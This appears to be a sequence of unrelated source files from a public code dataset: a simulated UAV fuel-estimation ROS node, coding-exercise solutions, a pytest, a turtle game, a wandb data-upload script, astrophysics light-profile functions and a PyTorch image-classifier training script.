Float64, self.fuel_consume_callback)\n\t\t\n\n\tdef uav_position_callback(self, data):\n\t\tself.uav_position.x = data.pose.position.x\n\t\tself.uav_position.y = data.pose.position.y\n\t\tself.uav_position.z = data.pose.position.z\n\n\tdef armed_callback(self, data):\n\t\tself.armed = data.armed\n\n\tdef takeoff_point_callback(self, data):\n\t\tself.takeoff_point = data\n\n\tdef grouping_point_callback(self, data):\n\t\tself.grouping_point = data\n\n\tdef drop_point_callback(self, data):\n\t\tself.drop_point = data\n\n\tdef landing_point_callback(self, data):\n\t\tself.landing_point = data\n\n\tdef cargo_callback(self, data):\n\t\tself.cargo = data.data\n\n\tdef fuel_resource_callback(self, data):\n\t\tself.fuel_resource_subscribe.data = data.data # in hours\n\n\tdef fuel_consume_callback(self, data):\n\t\tself.fuel_consume_subscribe.data = data.data # in hours\n\n\tdef calc_takeoff_landing_time(self):\n\t\tgain_alt_speed = 40.0 if self.uav_type == \"ralx6\" else 28.8 # km/h\n\t\tscout_height = 1.2 # km\n\t\tbomber_height = 0.4 # km\n\t\tif self.uav_name == \"scout\":\n\t\t\ttakeoff_time = scout_height/gain_alt_speed # hours\n\t\telif self.uav_name == \"bomber\":\n\t\t\ttakeoff_time = bomber_height/gain_alt_speed # hours\n\t\treturn takeoff_time\n\n\tdef calc_path_distance(self):\n\t\t'''\n\t\tCalculating path distance from uav_position to landing_point in meters. 
\n\t\tTakes into account the presence of cargo on the UAV and location of the drop point.\n\n\t\tOutput:\n\t\t\t- distance (in meters)\n\t\t'''\n\t\tif self.cargo:\n\t\t\tdist_1 = calc_distance(self.uav_position, self.drop_point)\n\t\t\tdist_2 = calc_distance(self.drop_point, self.landing_point)\n\t\t\tdistance = dist_1 + dist_2\n\t\telse:\n\t\t\tdistance = calc_distance(self.uav_position, self.landing_point)\n\t\treturn distance\n\n\tdef landing_fuel_resource(self):\n\t\t'''\n\t\tCalculating the amount of fuel resource that would be\n\t\tavailable to the drone if it returned to base right now.\n\n\t\tOutput:\n\t\t\t- fuel_data (dictionary):\n\t\t\t\t\"hours\": fuel_left_hours\n\t\t\t\t\"percent\": fuel_left_percent\n\t\t'''\n\t\tdistance = self.calc_path_distance()/1000 # kilometers\n\t\tmovement_in_hours = (distance/self.max_velocity) + self.calc_takeoff_landing_time() if self.uav_type==\"ralx6\" else (distance/self.max_velocity)\n\n\t\tfuel_left_hours = self.fuel_resource - movement_in_hours*self.max_fuel_resource\n\t\tfuel_left_percent = (fuel_left_hours/self.max_fuel_resource)*100\n\t\t#print(self.fuel_resource)\n\n\t\tfuel_data = {\"hours\": fuel_left_hours, \"percent\": fuel_left_percent}\n\t\treturn fuel_data\n\n\ndef calc_distance(point_1, point_2):\n\tx_1, y_1, _ = point_1.x, point_1.y, point_1.z\n\tx_2, y_2, _ = point_2.x, point_2.y, point_2.z\n\tdistance = np.sqrt((x_1 - x_2)**2 + (y_1 - y_2)**2)\n\treturn distance\n\ndef check_armed_uavs(uavs):\n\tarmed_uavs = []\n\tfor uav in uavs:\n\t\tif uav.armed == True:\n\t\t\tarmed_uavs.append(uav)\n\treturn armed_uavs\n\t\n\ndef fuel_check(n, scout_fuel, bombers_fuel, p):\n\t\"\"\"\n\t:param scout_fuel: scout fuel level\n\t:param bombers_fuel: fuel levels of bombers\n\t:param n: maximum amount of UAVs with critical fuel level\n\t:param p: critical fuel level\n\t:return: who should return\n\t\"\"\"\n\tif scout_fuel <= p:\n\t\tprint('return all UAVs')\n\t\treturn [0] # Return all UAVs\n\telse:\n\t\ttmp = list()\n\t\tcheck = 0\n\t\tfor i, b in bombers_fuel.items():\n\t\t\tif b <= p:\n\t\t\t\tcheck += 1\n\t\t\t\ttmp.append(i)\n\t\t\t\tif check >= n:\n\t\t\t\t\tprint('return all UAVs')\n\t\t\t\t\treturn [0] # Return all UAVs\n\t\tif check != 0:\n\t\t\t#Make message in list\n\t\t\toutput = [i for i in tmp]\n\t\t\toutput.insert(0, 1)\n\t\t\treturn output # Return not all (output = [1, ...])\n\t\telse:\n\t\t\tprint('no one returns')\n\t\t\treturn [-1] # No one returns\n\n\n\ndef start(uavs):\n\tstart_time = time.time()\n\twhile True:\n\n\t\tarmed_uavs = check_armed_uavs(uavs)\n\n\t\tif time.time() - start_time > TIME_BOUND:\n\t\t\tprint(\"2 sec.\")\n\t\t\tstart_time = time.time()\n\t\t\tif len(armed_uavs) > 0:\n\t\t\t\tscout_fuel = 0.0 # Why 0.0? 
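# --- Editor's worked example (illustrative numbers, not from the source) ---
# landing_fuel_resource() above, as written, reduces to:
#   hours_to_base = distance_km / max_velocity (+ takeoff/landing time for ralx6)
#   fuel_left     = fuel_resource - hours_to_base * max_fuel_resource
# e.g. a ralx6 scout 10 km out, flying 60 km/h with 0.5 h of fuel on board:
_hours_to_base = 10.0 / 60.0 + (1.2 / 40.0)      # cruise time + climb time, hours
_fuel_left_hours = 0.5 - _hours_to_base * 0.8333
print(round(_fuel_left_hours, 3))                # ~0.336 h of fuel at landing
# ---------------------------------------------------------------------------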
# TODO maybe here is error\n\t\t\t\tbombers_fuel = {}\n\t\t\t\tfor uav in armed_uavs:\n\t\t\t\t\tuav.fuel_resource -= (TIME_BOUND/3600.0)*uav.fuel_consume\n\t\t\t\t\tresource_data = uav.landing_fuel_resource()\n\t\t\t\t\tif uav.uav_name == \"bomber\":\n\t\t\t\t\t\tbombers_fuel[uav.uav_num] = resource_data[\"percent\"]\n\t\t\t\t\telif uav.uav_name == \"scout\":\n\t\t\t\t\t\tscout_fuel = resource_data[\"percent\"]\n\t\t\t\t\tprint(resource_data[\"percent\"], uav.uav_name)\n\t\t\t\t\t\n\t\t\t\t# Crit signal\n\t\t\t\tcrit_signal = fuel_check(N, scout_fuel, bombers_fuel, P)\n\t\t\t\tbattery_scout_info = [scout_fuel]\n\t\t\t\tbattery_bomber = [bombers_fuel]\n\t\t\t\t# Make message\n\t\t\t\tmessage_crit_signal = Int64MultiArray(data=crit_signal) # TODO maybe here is error\n\t\t\t\tmessage_battery_scout = Float64MultiArray(data=battery_scout_info)\n\t\t\t\tmessage_battery_bomber = Float64MultiArray(data=battery_bomber)\n\t\t\t\tprint(message_crit_signal.data)\n\t\t\t\t# Publish message\n\t\t\t\tcrit_sit_info.publish(message_crit_signal)\n\t\t\t\tbattery_stat_info.publish(message_battery_scout)\n\t\t\t\tbattery_bomber_info.publish(message_battery_bomber)\n\t\tif rospy.is_shutdown():\n\t\t\trospy.loginfo('Shutdown.')\n\t\t\tbreak\n\n\nif __name__ == \"__main__\":\n\tTIME_BOUND = 2.0 # sec\n\tN = 2 # Max number of UAVs with critical fuel level\n\tP = 5 # Percents\n\n\trospy.init_node(\"energy_evaluation\")\n\tcrit_sit_info = rospy.Publisher(\"/critical_status_info\", Int64MultiArray, queue_size=10)\n\tbattery_stat_info = rospy.Publisher(\"/battery_status_info\", Float64MultiArray, queue_size=10)\n\tbattery_bomber_info = rospy.Publisher(\"bomber/battery_status_info\", Float64MultiArray, queue_size=10)\n\t# Init UAVs\n\tscout0 = UAV(\"ralx6\", \"scout\", 0)\n\tbomber1 = UAV(\"ralx6\", \"bomber\", 1)\n\tbomber2 = UAV(\"ralx6\", \"bomber\", 2)\n\tbomber3 = UAV(\"ralx6\", \"bomber\", 3)\n\n\tuavs = [scout0, bomber1, bomber2, bomber3]\n\t#uavs = [scout0]\n\n\tscout0.fuel_resource = scout0.fuel_resource_subscribe.data\n\tscout0.fuel_consume = scout0.fuel_consume_subscribe.data\n\t\n\tbomber1.fuel_resource = bomber1.fuel_resource_subscribe.data\n\tbomber1.fuel_consume = bomber1.fuel_consume_subscribe.data\n\t\n\tbomber2.fuel_resource = bomber2.fuel_resource_subscribe.data\n\tbomber2.fuel_consume = bomber2.fuel_consume_subscribe.data\n\t\n\tbomber3.fuel_resource = bomber3.fuel_resource_subscribe.data\n\tbomber3.fuel_consume = bomber3.fuel_consume_subscribe.data\n\n\tstart(uavs)\t\n","repo_name":"IgorLebed/UAV_Swarm_gazebo","sub_path":"catkin_ws/src/path_ta/better_task/energy_compute.py","file_name":"energy_compute.py","file_ext":"py","file_size_in_byte":9560,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"22513584512","text":"#!/bin/python\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'diagonalDifference' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts 2D_INTEGER_ARRAY arr as parameter.\n#\n\ndef diagonalDifference(arr):\n    # Write your code here\n    d1,d2=0,0\n    for i in range(0,n):\n        d1+=arr[i][i]\n        d2+=arr[i][-(i+1)]\n    return abs(d1-d2)\n    \nif __name__ == '__main__':\n    fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n    n = int(raw_input().strip())\n\n    arr = []\n\n    for _ in xrange(n):\n        arr.append(map(int, raw_input().rstrip().split()))\n\n    result = diagonalDifference(arr)\n\n    fptr.write(str(result) + '\\n')\n\n    
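# --- Editor's worked example (illustrative, not part of the source file) ---
# For a 3x3 matrix, d1 sums arr[i][i] (main diagonal) and d2 sums
# arr[i][-(i+1)] (anti-diagonal); the answer is |d1 - d2|:
_m = [[11, 2, 4], [4, 5, 6], [10, 8, -12]]
_d1 = 11 + 5 + (-12)      # = 4
_d2 = 4 + 5 + 10          # = 19
assert abs(_d1 - _d2) == 15
# ---------------------------------------------------------------------------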
fptr.close()\n","repo_name":"DSC-COEA-Ambajogai/Hacktoberfest2020","sub_path":"Write_Program_in_any_lang/python/DiagDifference.py","file_name":"DiagDifference.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"3"} +{"seq_id":"27958222431","text":"from enum import Enum\nfrom typing import Literal\n\nfrom docstring_parser import parse\nfrom pydantic import create_model\n\nfrom openai_func_call.assembly import CallableFunction, func_to_callable_function\n\n\ndef test_func_to_callable_function():\n class EnumType(str, Enum):\n enum1: str = \"enum1\"\n enum2: str = \"enum2\"\n\n def test_function(\n str_param: str,\n float_param: float,\n int_param: int,\n literal_param: Literal[\"option1\", \"option2\"],\n enum_param: EnumType,\n default_str_param: str = \"default_str_param\",\n ):\n \"\"\"Description of test function here.\n :param str_param: This is the string parameter.\n :param float_param: This is the float parameter.\n :param int_param: This is the int parameter.\n :param literal_param: This is the literal parameter.\n :param enum_param: This is the enum parameter.\n :param default_str_param: This is the default string parameter.\n \"\"\"\n ...\n\n callable_function = func_to_callable_function(test_function)\n # -- Expected --\n params_model = create_model(\n \"FunctionArgsModel\",\n str_param=(str, ...),\n float_param=(float, ...),\n int_param=(int, ...),\n literal_param=(Literal[\"option1\", \"option2\"], ...),\n enum_param=(EnumType, ...),\n default_str_param=(str, \"default_str_param\"),\n )\n doc_str = parse(test_function.__doc__)\n api_dict = {\n \"name\": \"test_function\",\n \"description\": \"Description of test function here.\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"str_param\": {\"type\": \"string\", \"description\": \"This is the string parameter.\"},\n \"float_param\": {\n \"type\": \"number\",\n \"description\": \"This is the float parameter.\",\n },\n \"int_param\": {\"type\": \"integer\", \"description\": \"This is the int parameter.\"},\n \"literal_param\": {\n \"type\": \"string\",\n \"enum\": [\"option1\", \"option2\"],\n \"description\": \"This is the literal parameter.\",\n },\n \"enum_param\": {\n \"type\": \"string\",\n \"enum\": [\"enum1\", \"enum2\"],\n \"description\": \"This is the enum parameter.\",\n },\n \"default_str_param\": {\n \"type\": \"string\",\n \"description\": \"This is the default string parameter.\",\n },\n },\n \"required\": [\"str_param\", \"float_param\", \"int_param\", \"literal_param\", \"enum_param\"],\n },\n }\n expected = CallableFunction(\n name=\"test_function\",\n params_model=params_model,\n function=test_function,\n api_dict=api_dict,\n doc_str=doc_str,\n )\n exclude = {\"doc_str\", \"params_model\"}\n # -- Asserts --\n assert callable_function.dict(exclude=exclude) == expected.dict(\n exclude=exclude\n ), f\"callable_function: {callable_function}\\nexpected: {expected}\"\n\n for field_key in callable_function.params_model.__fields__.keys():\n for property in [\"name\", \"type_\", \"default\", \"required\", \"alias\"]:\n assert getattr(callable_function.params_model.__fields__[field_key], property) == getattr(\n expected.params_model.__fields__[field_key], property\n ), f\"callable_function: {callable_function}\\nexpected: 
{expected}\"\n","repo_name":"joloppo/openai_func_call","sub_path":"tests/test_assembly.py","file_name":"test_assembly.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30474663633","text":"class Solution(object):\n def permute(self, nums):\n \n res = []\n \n #base case\n if (len(nums) == 1):#ssample input of nums = 1 then return it as a list or only single permutation \n return [nums[:]]\n \n for i in range(len(nums)):\n n = nums.pop(0)#first element i the list is popped while going thro the trree\n perms = self.permute(nums)#recursive call\n \n for perm in perms:\n perm.append(n)#the n from which we jave popped is apoended like 2,3 3,2 it is appended and in the next step the poppped elemtn is extened with this to get the permutations\n res.extend(perms)\n nums.append(n)\n \n return res\n","repo_name":"nidhish-create/LEETCODE-QUESTIONS","sub_path":"permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37065707011","text":"import random\nimport time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\nscreen.title(\"Crossy Turtle\")\nplayer = Player()\ncar_manager = CarManager()\nscoreboard = Scoreboard()\n\nscreen.listen()\nscreen.onkey(fun=player.move, key=\"w\")\n\ngame_is_on = True\nwhile game_is_on:\n\n time.sleep(0.1)\n screen.update()\n\n if random.randint(1, 5) == 1:\n car_manager.create_car()\n\n for car in car_manager.cars_list:\n if (car.distance(player)) < 25 and (player.ycor() - car.ycor() <= 12):\n print(car.ycor())\n print(player.ycor())\n game_is_on = False\n\n if player.ycor() > 280:\n player.refresh()\n car_manager.level_up()\n scoreboard.update_scoreboard()\n\n for car in car_manager.cars_list:\n if car.xcor() < -320:\n car.hideturtle()\n car_manager.cars_list.remove(car)\n\n car_manager.move_all()\n","repo_name":"jananpatel2002/turtle-crossing-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34776051644","text":"# upload_test_data.py\n# -----------------------------\n# The dataset owner runs this script to create two Artifacts:\n# - type=test_dataset: the ids & images, no labels\n# - type=labeled_test_dataset, contains the correct labels\n# These are stored in different projects (Demo project and Answers\n# project, respectively) so the test answers can be held secret.\nimport argparse\nimport numpy as np\nimport os\nfrom PIL import Image\nimport util\nimport wandb\n\ndef upload_test_data(args):\n # create test data artifact and table (ids and images only) \n demo_at = wandb.Artifact(\"test_data\", type=\"test_dataset\")\n columns = [\"id\", \"raw_image\"]\n demo_table = wandb.Table(columns=columns)\n\n # create the answers (labeled) artifact \n answers_at = wandb.Artifact(\"answer_key\", type=\"labeled_test_dataset\")\n answer_cols = [\"id\", \"raw_image\", \"labeled_image\", \"raw_label\"]\n answer_table = wandb.Table(columns=answer_cols)\n\n # upload images \n images = [f for f in os.listdir(args.image_path)][:util.NUM_EXAMPLES]\n for idx, image in enumerate(images):\n train_id = image.split(\".\")[0]\n image_file = 
os.path.join(args.image_path, image)\n        raw_image = wandb.Image(image_file)\n        \n        label_file = os.path.join(args.label_path, train_id + \"_train_id.png\")\n        \n        # visualize the labels with full-featured semantic segmentation\n        annotated = wandb.Image(image_file, classes=util.class_set,\n                    masks={\"ground_truth\" : {\"mask_data\": np.array(Image.open(label_file))}})\n\n        # add images only to the Demo visualization table\n        demo_table.add_data(train_id, raw_image)\n        # add files to artifact (optional, needed here to explicitly set the path for download) \n        demo_at.add_file(image_file, os.path.join(\"images\", image))\n\n        # add images and labels to the Answer visualization table and artifact\n        answer_table.add_data(train_id, raw_image, annotated, wandb.Image(np.array(Image.open(label_file))))\n        answers_at.add_file(image_file, os.path.join(\"images\", image))\n        answers_at.add_file(label_file, os.path.join(\"labels\", train_id + \"_train_id.png\"))\n\n    # add tables to artifacts\n    demo_at.add(demo_table, \"test_data\")\n    answers_at.add(answer_table, \"answer_key\")\n\n    # upload the unlabeled test data to the Demo project\n    run = wandb.init(project=args.demo_project, job_type=\"upload_test_data\")\n    run.log_artifact(demo_at)\n    run.finish()\n\n    # upload the labeled test data to the Answer project\n    run = wandb.init(project=args.answer_project, job_type=\"upload_test_data\")\n    run.log_artifact(answers_at)\n    run.finish()\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\n        \"-d\",\n        \"--demo_project\",\n        type=str,\n        default=util.DEMO_PROJECT,\n        help=\"demo project name: where participants will find the test data\")\n    parser.add_argument(\n        \"-a\",\n        \"--answer_project\",\n        type=str,\n        default=util.ANSWER_PROJECT,\n        help=\"answer project name: where organizers will see the test answers and evaluations\")\n    parser.add_argument(\n        \"-i\",\n        \"--image_path\",\n        type=str,\n        default=\"../../../BigData/bdd100K/bdd100k/seg/images/train/\",\n        help=\"source path for image data\")\n    parser.add_argument(\n        \"-l\",\n        \"--label_path\",\n        type=str,\n        default=\"../../../BigData/bdd100K/bdd100k/seg/labels/train/\",\n        help=\"source path for ground truth labels\")\n    \n    args = parser.parse_args()\n    upload_test_data(args)\n\n","repo_name":"staceysv/evalserver","sub_path":"upload_test_data.py","file_name":"upload_test_data.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35836328521","text":"class Solution:\n    def shortestToChar(self, S, C):\n        s_len = len(S)\n        dist_arr = [float('inf')] * s_len\n        c_idx = float('inf')\n\n        for idx, ch in enumerate(S):\n            if ch == C:\n                c_idx = idx\n            dist_arr[idx] = min(dist_arr[idx], abs(c_idx - idx))\n\n        c_idx = float('inf')\n        for idx in range(s_len - 1, -1, -1):\n            if S[idx] == C:\n                c_idx = idx\n            dist_arr[idx] = min(dist_arr[idx], abs(c_idx - idx))\n        return dist_arr\n","repo_name":"s-surineni/atice","sub_path":"leet_code/shortest_dist_to_char2.py","file_name":"shortest_dist_to_char2.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74041074960","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.tri as tri\n\nfrom visualization_functions import *\nfrom ellipsoid_projection import *\nfrom alignment_functions import *\nfrom lightProfile_functions import *\n\nimport time, random, scipy\nfrom scipy.spatial.transform import Rotation as 
R\nimport scipy.special\nimport scipy.interpolate\n\n\ndef get_projected_shape_fromParameters(c, b, a=1, r_matrix='random', p_axis='x'):\n '''project 3D ellipse to random orientation given minor, mid, and major axis lengths. \n Returns 2D axis ratio projected along p_axis'''\n \n if type(r_matrix)==str:\n r_matrix = R.random()\n r_matrix.as_matrix()\n\n # eigen vectors\n evc0 = np.asarray([[0,0,1],[0,1,0],[1,0,0]])\n evc = r_matrix.apply(evc0)\n\n evl = np.asarray([c, b, a])**2\n \n if p_axis=='x':\n K = np.sum(evc[:,0][:,None] * (evc / evl[:,None]), axis=0)\n r = evc[:,2] - evc[:,0]*K[2]/K[0]\n s = evc[:,1] - evc[:,0]*K[1]/K[0]\n \n if p_axis=='y':\n K = np.sum(evc[:,1][:,None] * (evc / evl[:,None]), axis=0)\n\n r = evc[:,0] - evc[:,1]*K[0]/K[1]\n s = evc[:,2] - evc[:,1]*K[2]/K[1]\n \n A = np.sum(r**2 / evl, axis=0)\n B = np.sum(2*r*s / evl, axis=0)\n C = np.sum(s**2 / evl, axis=0)\n # for p_axis='x', theta is the angle relative to z, in the direciton of +y\n # for p_axis='y', theta is the angle relative to x, in the direciton of +z\n theta = np.pi/2 + np.arctan2(B, A-C) / 2\n a_p = 1 / np.sqrt((((A+C)/2) + ((A-C)/(2*np.cos(2*theta)))))\n b_p = 1 / np.sqrt(A + C - (1/a_p**2))\n \n return (b_p/a_p), theta\n\n\n\n### LIGHT PROFILE PARAMETERS ####################\n# From https://github.com/dstndstn/tractor/blob/main/tractor/mixture_profiles.py\nmix_A_luv = np.array([4.26347652e-02, 2.40127183e-01, 6.85907632e-01, 1.51937350e+00,\n 2.83627243e+00, 4.46467501e+00, 5.72440830e+00, 5.60989349e+00])\nmix_r_luv = np.sqrt(np.array([2.23759216e-04, 1.00220099e-03, 4.18731126e-03, 1.69432589e-02,\n 6.84850479e-02, 2.87207080e-01, 1.33320254e+00, 8.40215071e+00]))\ndev_core = 0.010233\nmix_A_luv *= (1. - dev_core) / np.sum(mix_A_luv)\nmix_A_luv = np.append(mix_A_luv, dev_core)\nmix_r_luv = np.append(mix_r_luv, 1.0e-08)\n\ndef luv_profile(r):\n profile = r*0.0\n for j in range(len(mix_r_luv)):\n profile = profile + np.exp(-(r/mix_r_luv[j])**2/2.0)*mix_A_luv[j]/mix_r_luv[j]**3\n return profile\n\nmix_A_lux = np.array([2.34853813e-03, 3.07995260e-02, 2.23364214e-01,\n 1.17949102e+00, 4.33873750e+00, 5.99820770e+00])\nmix_r_lux = np.sqrt(np.array([1.20078965e-03, 8.84526493e-03, 3.91463084e-02,\n 1.39976817e-01, 4.60962500e-01, 1.50159566e+00]))\n\ndef lux_profile(r):\n profile = r*0.0\n for j in range(len(mix_r_lux)):\n profile = profile + np.exp(-(r/mix_r_lux[j])**2/2.0)*mix_A_lux[j]/mix_r_lux[j]**3\n return profile\n\n\ndef exp_profile(r):\n return scipy.special.kn(0,r)\n\ndef Hern_profile(r):\n return 1.0/r/(r+1)**3\n\ndef make_profile_rs(f, binwidth=np.full(20*100, 0.01)):\n # This is written so that one can use non-uniform bin widths in later application\n rcen = np.cumsum(binwidth)-binwidth[0]/2.0\n mass_profile = np.insert(np.cumsum(rcen**2*f(rcen)*binwidth+1e-10), 0, 0.0)\n mass_profile = mass_profile/mass_profile[-1]\n r_profile = np.insert(rcen+0.5*binwidth, 0, 0.0)\n spline = scipy.interpolate.InterpolatedUnivariateSpline(mass_profile, r_profile)\n halfmass = spline(0.5)\n rad_3d = spline((np.arange(1e5)+0.5)/1e5)/halfmass\n return rad_3d\n#############################\n\n\ndef get_light_profile(model_type, N=100000):\n \n if model_type == 'DEV':\n r = make_profile_rs(luv_profile)\n elif model_type == 'EXP' or model_type == 'PSF' or model_type == 'REX':\n r = make_profile_rs(lux_profile)\n elif model_type == 'SER':\n r = make_profile_rs(Hern_profile)\n else:\n print(model_type)\n r = make_profile_rs(Hern_profile)\n \n r_max=1\n # generating uniform points in cube\n q=int((N*2)**(1/3))\n x_ = 
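# --- Editor's sanity check (illustrative, self-contained) ---
# In the quadric algebra above, a sphere gives A == C and B == 0; the
# formulas for theta, a_p, b_p must then yield a projected axis ratio of 1:
import numpy as np
A = C = 2.0
B = 0.0
theta = np.pi / 2 + np.arctan2(B, A - C) / 2
a_p = 1 / np.sqrt(((A + C) / 2) + ((A - C) / (2 * np.cos(2 * theta))))
b_p = 1 / np.sqrt(A + C - (1 / a_p**2))
assert abs(b_p / a_p - 1.0) < 1e-9
# -------------------------------------------------------------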
np.linspace(-r_max, r_max, q)\n    y_ = np.linspace(-r_max, r_max, q)\n    z_ = np.linspace(-r_max, r_max, q)\n    x0, y0, z0 = np.meshgrid(x_, y_, z_)\n    frame0 = np.asarray([x0.flatten(), y0.flatten(), z0.flatten()])\n    \n    dists = frame0[0]**2 + frame0[1]**2 + frame0[2]**2\n    inside_r = frame0[:,(((dists)<r_max**2)&((dists)>0))] # reject all outside a sphere and any that might be at 0\n    h_points = inside_r[:,np.random.randint(0, len(inside_r[0]), N)] # match number of r\n    h_points = r * h_points / np.sqrt(h_points[0]**2 + h_points[1]**2 + h_points[2]**2) # scale by radii\n    return h_points\n\n\n\ndef shape_transformation_2D(a, b, c, r_matrix, h_points, scale=1, p_axis='z'):\n    '''\n    a, b, c: relative sizes of axis ratios\n    scale: size of galaxy\n    orientation_angle0, orientation_angle1: orientation about z and y, respectively\n    '''\n    r_matrix.as_matrix()\n    scale_matrix = np.asarray([[a,0,0],[0,b,0],[0,0,c]])\n    shape_scaled = np.matmul(scale_matrix, h_points)\n    M3D = r_matrix.apply(shape_scaled.transpose()).transpose()\n    \n    if p_axis=='z':\n        return M3D[:2] # retain just the x and y direction\n    if p_axis=='x':\n        return M3D[1:] # retain just the y and z direction\n    \n\n\n\ndef find_r_half(h_points):\n    return np.sqrt(np.median(h_points[0]**2 + h_points[1]**2))\n\n\ndef app_sum(M_points_2D, rad_image_sq):\n    in_aperature = (M_points_2D[0]**2 + M_points_2D[1]**2) < rad_image_sq\n    \n    return len(M_points_2D[:,in_aperature][0])","repo_name":"cmlamman/ellipse_alignment","sub_path":"functions/lightProfile_functions.py","file_name":"lightProfile_functions.py","file_ext":"py","file_size_in_byte":5617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17594704229","text":"import os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision import transforms, datasets\nfrom PIL import Image\nfrom sklearn.metrics import f1_score\n\n\n# 1. 
Load and preprocess the dataset\nclass CustomDataset(Dataset):\n    def __init__(self, root_dir, transform=None):\n        self.root_dir = root_dir\n        self.transform = transform\n        self.images, self.labels = self.load_data()\n\n    def load_data(self):\n        img_paths = []\n        labels = []\n        self.classes = os.listdir(self.root_dir)\n        for label, class_name in enumerate(self.classes):\n            class_dir = os.path.join(self.root_dir, class_name)\n            for img_name in os.listdir(class_dir):\n                img_paths.append(os.path.join(class_dir, img_name))\n                labels.append(label)\n        return img_paths, labels\n\n    def __len__(self):\n        return len(self.images)\n\n    def __getitem__(self, idx):\n        img_path = self.images[idx]  # get the path to the image\n        image = Image.open(img_path).convert('RGB')  # open the image and convert it to RGB\n        label = self.labels[idx]\n        if self.transform:\n            image = self.transform(image)\n        return image, label\n\n    def __str__(self):\n        class_str = \", \".join(self.classes)\n        return f\"CustomDataset with classes: {class_str}\"\n\n\nclass VGGLike(nn.Module):\n    def __init__(self):\n        super(VGGLike, self).__init__()\n\n        self.features = nn.Sequential(\n            nn.Conv2d(3, 64, kernel_size=3, padding=1),\n            nn.ReLU(inplace=True),\n            nn.Conv2d(64, 64, kernel_size=3, padding=1),\n            nn.ReLU(inplace=True),\n            nn.MaxPool2d(kernel_size=2, stride=2),\n\n            nn.Conv2d(64, 128, kernel_size=3, padding=1),\n            nn.ReLU(inplace=True),\n            nn.Conv2d(128, 128, kernel_size=3, padding=1),\n            nn.ReLU(inplace=True),\n            nn.MaxPool2d(kernel_size=2, stride=2),\n        )\n\n        self.classifier = nn.Sequential(\n            nn.Linear(128 * 32 * 32, 4096),\n            nn.ReLU(True),\n            nn.Dropout(),\n            nn.Linear(4096, 4096),\n            nn.ReLU(True),\n            nn.Dropout(),\n            nn.Linear(4096, 1),\n        )\n\n    def forward(self, x):\n        x = self.features(x)\n        x = x.view(x.size(0), -1)\n        x = self.classifier(x)\n        return torch.sigmoid(x)\n\n\n# 2. Define the CNN model\nclass CNNModel(nn.Module):\n    def __init__(self):\n        super(CNNModel, self).__init__()\n        self.conv1 = nn.Conv2d(3, 16, kernel_size=3, stride=1, padding=1)\n        self.relu = nn.ReLU()\n        self.maxpool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)\n        self.fc1 = nn.Linear(16 * 64 * 64, 1)\n\n    def forward(self, x):\n        out = self.conv1(x)\n        out = self.relu(out)\n        out = self.maxpool(out)\n        out = out.view(out.size(0), -1)\n        out = self.fc1(out)\n        out = torch.sigmoid(out)  # apply the sigmoid\n        return out\n\n\nif __name__ == \"__main__\":\n\n    print(torch.cuda.is_available())\n    device = torch.device('cuda')\n    # if torch.cuda.is_available() else 'cpu')\n\n    transform = transforms.Compose([\n        transforms.Resize((130, 130)),  # resizing to a bit larger size before random crop\n        transforms.RandomCrop((128, 128)),\n        transforms.RandomHorizontalFlip(),\n        transforms.RandomRotation(10),\n        transforms.ToTensor(),\n    ])\n\n    train_dataset = CustomDataset(\"train_data\", transform)\n    print(train_dataset)\n\n    train_loader = DataLoader(train_dataset, batch_size=32, shuffle=True)\n\n    model = VGGLike()\n    model.to(device)\n\n    # 3. Define the loss function and optimizer\n    criterion = nn.BCELoss()\n    optimizer = optim.Adam(model.parameters(), lr=0.001)\n\n    # 4. 
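# --- Editor's shape walkthrough (illustrative; assumes the VGGLike class
# above is in scope). The two conv blocks each end in a 2x2 max-pool, so a
# 3x128x128 input shrinks 128 -> 64 -> 32 spatially, which is why the first
# Linear layer expects 128*32*32 features. A hedged smoke test:
import torch
x = torch.randn(1, 3, 128, 128)
y = VGGLike()(x)
assert y.shape == (1, 1) and 0.0 < float(y) < 1.0  # sigmoid keeps output in (0, 1)
# --------------------------------------------------------------------------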
Train the model\n    for epoch in range(10):  # loop over the dataset multiple times\n\n        running_loss = 0.0\n        all_preds = []  # Store all predictions\n        all_labels = []  # Store all true labels\n\n        for i, (inputs, labels) in enumerate(train_loader, 0):\n            inputs, labels = inputs.to(device), labels.to(device)\n\n            # reshape the labels and convert them to float\n            labels = labels.view(-1, 1).float()\n\n            # zero the parameter gradients\n            optimizer.zero_grad()\n\n            # forward + backward + optimize\n            outputs = model(inputs)\n            loss = criterion(outputs, labels)\n            loss.backward()\n            optimizer.step()\n\n            running_loss += loss.item()\n\n            # Store predictions and true labels\n            preds = outputs.detach().cpu().numpy() > 0.5  # Convert to binary predictions\n            all_preds.extend(preds)\n            all_labels.extend(labels.cpu().numpy())\n\n        # Calculate F1 